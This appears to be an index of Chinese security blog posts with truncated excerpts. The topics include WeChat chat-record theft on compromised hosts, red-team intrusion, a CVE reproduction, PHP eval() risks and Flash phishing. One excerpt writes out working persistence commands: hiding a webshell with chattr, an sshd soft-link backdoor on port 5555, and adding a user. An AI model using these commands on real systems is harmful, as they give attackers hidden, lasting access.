上线机器微信聊天记录提取
微信聊天记录提取 https://github.com/AdminTest0/SharpWxDump 版本 < 3.7.0.30 只运行不登录能获取个人信息,登录后可以获取数据库密钥 版本 > 3.7.0.30 只运行不登录不能获取个人信息,登...
权限维持 – 后门隐藏技术
文件上锁 chattr +i webshell.php lsattr webshell.php chattr -i webshell.php ssh 软链接 ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555; useradd test -p test 不死马 访问该 php 文...
某次重要攻防演练细节打点到攻陷内网分享
01成果概述 外网打点,先拿到JeecgBoot权限,再骚操作对若依系统GetShell 获取到某某有限公司多个主机权限和后台权限 后台权限:10.0.***.**:8848/nacos/#/ 10.0.***.***(服务器权限) 10.0.**...
漏洞复现-CVE-2023-46359
一:漏洞描述 Salia PLCC 提供的产品包括通信模块、智能电表、数据采集设备等,旨在帮助用户实现电力系统的远程监控、数据传输和智能化管理。他们的解决方案可以提高能源利用效率,改善电力系统...
Llama 3 正式发布!性能怎么样? 附最新下载安装教程 !轻松实现本地部署,完全免费开源!
Llama 3 大模型下载安装:https://xsx.tw/ai/4177/更简单的安装方法:https://xsx.tw/ai/4135/
PHP Eval() 的危险
远程代码执行的入口 PHP 的 eval() 函数通常被称为 Web 开发中最具争议的功能之一,它是一把双刃剑。一方面,它提供了一种动态执行 PHP 代码的强大方法,但另一方面,它打开了安全漏洞的潘多拉...
Flash网页钓鱼
简介 Flash钓鱼攻击是一种网络攻击手段,旨在欺骗用户访问伪造的Flash更新页面,并诱使他们下载并安装恶意软件。这种攻击通常利用用户对Flash更新的需求,以及对合法更新网站的信任。攻击者通常...
